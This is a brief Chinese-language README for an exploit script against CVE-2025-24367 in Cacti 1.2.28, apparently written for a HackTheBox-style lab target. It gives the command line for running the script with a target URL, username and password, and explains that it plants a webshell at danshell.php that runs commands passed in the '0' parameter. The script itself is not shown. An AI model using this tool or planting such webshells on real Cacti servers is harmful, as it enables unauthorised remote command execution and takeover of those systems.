我为 CVE-2025-24367 编写了这个小型脚本——针对 Cacti 1.2.28 版本,该脚本利用 Cacti 的漏洞获取 webshell。
脚本使用方法:
python CVE-2025-24367-Exploit.py --url "http://webEjemplo.htb/cacti/" --user "usuario" --password "password"
连接成功后,将在参数 danshell.php?0=<命令> 中生成一个 webshell,您可以在其中执行命令,主要是 shell。

